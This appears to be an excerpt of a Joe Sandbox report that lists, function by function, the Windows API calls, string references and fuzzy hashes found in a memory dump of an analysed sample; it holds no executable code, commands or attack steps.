Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: c71cbe84f2c5e2af5d9777ce7a515aa0e97f0633ebb964575d48d01304e284ae
Instruction ID: 0a7a506feae95326bdfbbdbe4bbc846970fe3cccbb7fec4fbae78eac38b043bf
Opcode Fuzzy Hash: c71cbe84f2c5e2af5d9777ce7a515aa0e97f0633ebb964575d48d01304e284ae
Instruction Fuzzy Hash: F74157729052189EDF17EFA4C985BDDB7B9AF09380F0440E6E509E7142EA38AA44CB50

Function 007A2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007A2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 007A2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 007A2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007A2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007A2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 007A2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007A2F0B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 23aebe6b5ca12811621ccb2092da6542b400fb75c878d063ddb77841c4a8c8ee
Instruction ID: c310c7d8a3e36e395a4c7a68bfb87f3074e547fdeab5bd17e06dd89eb09ee7bd
Opcode Fuzzy Hash: 23aebe6b5ca12811621ccb2092da6542b400fb75c878d063ddb77841c4a8c8ee
Instruction Fuzzy Hash: 8631F230609290EFEB21CF5CDC89F6537E1EB8A710F1542A4F9008F2B2CB79A881DB45

Function 00777726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00777769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077778F
SysAllocString.OLEAUT32(00000000), ref: 00777792
SysAllocString.OLEAUT32(?), ref: 007777B0
SysFreeString.OLEAUT32(?), ref: 007777B9
StringFromGUID2.OLE32(?,?,00000028), ref: 007777DE
SysAllocString.OLEAUT32(?), ref: 007777EC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 3f3f22f66ee26b01266cf91464cdb0129e502b9bba6fea7bd5c6913e177002c4
Instruction ID: 09a9dcb49e9006cf5908129c2e009c96f134ff7a7f7c4ed34da84dff5c16c833
Opcode Fuzzy Hash: 3f3f22f66ee26b01266cf91464cdb0129e502b9bba6fea7bd5c6913e177002c4
Instruction Fuzzy Hash: 97219C76604219BFDF199FA8DC89CBB77ACEB093A4700C025FA08DB150D6789C41C7A8

Function 007777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00777842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00777868
SysAllocString.OLEAUT32(00000000), ref: 0077786B
SysAllocString.OLEAUT32 ref: 0077788C
SysFreeString.OLEAUT32 ref: 00777895
StringFromGUID2.OLE32(?,?,00000028), ref: 007778AF
SysAllocString.OLEAUT32(?), ref: 007778BD

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f5413f3f650ec9efe72cfbf79bfe77233f4242abc7f44ba1df45c79029faaa21
Instruction ID: 9e3dcb49674d962a2c720522d141ad1aedd61244d11c3c988cc51fe0af1a02c4
Opcode Fuzzy Hash: f5413f3f650ec9efe72cfbf79bfe77233f4242abc7f44ba1df45c79029faaa21
Instruction Fuzzy Hash: 36218E71608204BF9F159BA8DC8CDBA77ECEB493A0710C125F919CB2A1DA78DC41CB69

Function 007804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007804F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0078052E

Strings

nul, xrefs: 00780567

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b40fa0838365418bacb923c96461c477e7681888106ead078c16920ae6fd27bd
Instruction ID: 7b8f6bda2c5ffe09df9b6f25b1e90c2463d79f61a8da658618865e81941c0a9d
Opcode Fuzzy Hash: b40fa0838365418bacb923c96461c477e7681888106ead078c16920ae6fd27bd
Instruction Fuzzy Hash: F2218071640305AFDB20AF29DC08E9A77F4BF85724F204A19F8A1D62E0D7749968CFB0

Function 007805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007805C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00780601

Strings

nul, xrefs: 00780639

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: ec328e11b76ccff67adcac441180115cad45139a064b99ef8e98e3e47f8efb8d
Instruction ID: c91ddfd124518ab22963c918711ac8f18e4687b9b3f0c2015bb1eba70a67dbd6
Opcode Fuzzy Hash: ec328e11b76ccff67adcac441180115cad45139a064b99ef8e98e3e47f8efb8d
Instruction Fuzzy Hash: 8521B775640305AFDB60AF68CC08A5A77F4BF85720F204B19F8B1D32D0E7749864CBA0

Function 007A40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0071600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0071604C
Part of subcall function 0071600E: GetStockObject.GDI32(00000011), ref: 00716060
Part of subcall function 0071600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0071606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007A4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007A411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007A412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007A4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007A4145

Strings

Msctls_Progress32, xrefs: 007A40E3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: af3995b0c90db14dfc0402c096d5c7453315158fbb1fda31bb7ec055b6f5b108
Instruction ID: 1b83b845f1595856cc86a4abe0b7f6901d3b5097a2e3b11519934f9dc5678275
Opcode Fuzzy Hash: af3995b0c90db14dfc0402c096d5c7453315158fbb1fda31bb7ec055b6f5b108
Instruction Fuzzy Hash: 5E11B6B214011DBEEF119F64CC85EE77F9DEF49798F004211B618A6150C6769C61DBA4

Function 0074D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0074D7A3: _free.LIBCMT ref: 0074D7CC

_free.LIBCMT ref: 0074D82D

Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0

_free.LIBCMT ref: 0074D838
_free.LIBCMT ref: 0074D843
_free.LIBCMT ref: 0074D897
_free.LIBCMT ref: 0074D8A2
_free.LIBCMT ref: 0074D8AD
_free.LIBCMT ref: 0074D8B8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: b320a4b62d0a679d12d76f64c39e08dea60116b76b557046721243a63fd439b6
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: D111DD71541B04EBE932BFB1CC4BFCB7BDC6F05700F804825B2D9A65A2DB79B9164A50

Function 0077DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0077DA74
LoadStringW.USER32(00000000), ref: 0077DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0077DA91
LoadStringW.USER32(00000000), ref: 0077DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0077DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0077DAB9

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 54ca8737d381320f9bdd0e509c3768f78c1f120ad13d7826effbdc8666f8b3c9
Instruction ID: 338dbc0c5e1da14efc52f98b726e3c234bd3d4ebef394f32c4e02f25a59f4b12
Opcode Fuzzy Hash: 54ca8737d381320f9bdd0e509c3768f78c1f120ad13d7826effbdc8666f8b3c9
Instruction Fuzzy Hash: E50162F25002087FEB11DBA0DD89EE7336CEB09741F408496B70AE2041EA789E844F74

Function 0078096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(012EEA30,012EEA30), ref: 0078097B
EnterCriticalSection.KERNEL32(012EEA10,00000000), ref: 0078098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 0078099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007809A9
CloseHandle.KERNEL32(00000000), ref: 007809B8
InterlockedExchange.KERNEL32(012EEA30,000001F6), ref: 007809C8
LeaveCriticalSection.KERNEL32(012EEA10), ref: 007809CF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 8ff25daf169209225ff19b02cd595b3a0898eadb738b21e244c51b329fcfd4f6
Instruction ID: 21c661b928f8a2bb304b205e712d579faaef1b687436dda6ecf709f7da615aa3
Opcode Fuzzy Hash: 8ff25daf169209225ff19b02cd595b3a0898eadb738b21e244c51b329fcfd4f6
Instruction Fuzzy Hash: E8F04431542502FBD7425F94EE8DBD67B35FF42702F405015F101508A0CB78A475CF95

Function 00791C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00791DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00791DE1
WSAGetLastError.WSOCK32 ref: 00791DF2
htons.WSOCK32(?,?,?,?,?), ref: 00791EDB
inet_ntoa.WSOCK32(?), ref: 00791E8C

Part of subcall function 007739E8: _strlen.LIBCMT ref: 007739F2

Part of subcall function 00793224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0078EC0C), ref: 00793240

_strlen.LIBCMT ref: 00791F35

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: c6cb28f33c8b0e28262d60dcd7584e44704c6ac37d9724bd588c9c7c4df6b996
Instruction ID: 7746c9cfa262d3f62e11df8b7163847667d24efe628348686620843d4748bc69
Opcode Fuzzy Hash: c6cb28f33c8b0e28262d60dcd7584e44704c6ac37d9724bd588c9c7c4df6b996
Instruction Fuzzy Hash: D8B12531204341EFCB24DF24D889E6A77E5AF85318F94854CF4564B2E2DB39ED82CB91

Function 007401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 007400BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007400D6
__allrem.LIBCMT ref: 007400ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0074010B
__allrem.LIBCMT ref: 00740122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00740140

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 934cd40fed86ad28cbe13f1e092e33dd65c2e715ff2e28a3c58434ae9a1df0b8
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: CF81F676A00706EBE720AE39CC45B6F73E9AF51364F24453AFA51D7682E778DD008B90

Function 007461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007382D9,007382D9,?,?,?,0074644F,00000001,00000001,8BE85006), ref: 00746258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0074644F,00000001,00000001,8BE85006,?,?,?), ref: 007462DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007463D8
__freea.LIBCMT ref: 007463E5

Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852

__freea.LIBCMT ref: 007463EE
__freea.LIBCMT ref: 00746413

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 365f97954fd25fcf71ab2548235e651a749657fb7dbb8b6e2ccd769453307e5c
Instruction ID: d003556acf7cc89bcb35faa0134dfadf6f7f799ecc34295b25a0b934bb3ccb50
Opcode Fuzzy Hash: 365f97954fd25fcf71ab2548235e651a749657fb7dbb8b6e2ccd769453307e5c
Instruction Fuzzy Hash: 1951E172A00256ABEB258F64CC85EBF7BAAEF46750F144669FC05D6180EB7CDC40C6A1

Function 0079BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 0079C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079B6AE,?,?), ref: 0079C9B5
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079C9F1
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA68
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0079BD25
RegCloseKey.ADVAPI32(00000000), ref: 0079BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0079BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0079BDF3
RegCloseKey.ADVAPI32(?), ref: 0079BDFF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 79b3d7ad48935c366855892e9be1a37f775f2f3477c8eb08c324fef2cda948a8
Instruction ID: e42279537fe5cf3be91be60ad1afef9cf88d2b0e0539ac95392fab1511ba2836
Opcode Fuzzy Hash: 79b3d7ad48935c366855892e9be1a37f775f2f3477c8eb08c324fef2cda948a8
Instruction Fuzzy Hash: 7B81CD30208241EFCB14DF24D995E6ABBE5FF85308F14885CF5594B2A2DB39ED45CB92

Function 0076F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0076F7B9
SysAllocString.OLEAUT32(00000001), ref: 0076F860
VariantCopy.OLEAUT32(0076FA64,00000000), ref: 0076F889
VariantClear.OLEAUT32(0076FA64), ref: 0076F8AD
VariantCopy.OLEAUT32(0076FA64,00000000), ref: 0076F8B1
VariantClear.OLEAUT32(?), ref: 0076F8BB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 39be56acca62131d513032b652e6bcec09de1c867e5df132f6e8a0a09f99ac7a
Instruction ID: 37b7ac6a2232b38e2e3b0c3cdc87627fd611a7bfc4dc6c07b787581a1d3ede74
Opcode Fuzzy Hash: 39be56acca62131d513032b652e6bcec09de1c867e5df132f6e8a0a09f99ac7a
Instruction Fuzzy Hash: 0951B631601310FACF24AB65E899B69B3E9EF45310B249467ED07DF291DB789C40CB96

Function 0078910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 007894E5
_wcslen.LIBCMT ref: 00789506
_wcslen.LIBCMT ref: 0078952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00789585

Strings

X, xrefs: 00789412

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: faa6a208e40cc01bbd6664c9fdd8684fa8770c0fd1f15055b1f75fba74fcee42
Instruction ID: 32a75576053e7a41b55c92101b8a47a3cd18d51b7b4abc4e7a46a7615d474caa
Opcode Fuzzy Hash: faa6a208e40cc01bbd6664c9fdd8684fa8770c0fd1f15055b1f75fba74fcee42
Instruction Fuzzy Hash: F6E1B431504340DFD724EF28C885AAAB7E0BF85314F08856DF9999B2A2DB39ED45CB91

Function 0072920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

BeginPaint.USER32(?,?,?), ref: 00729241
GetWindowRect.USER32(?,?), ref: 007292A5
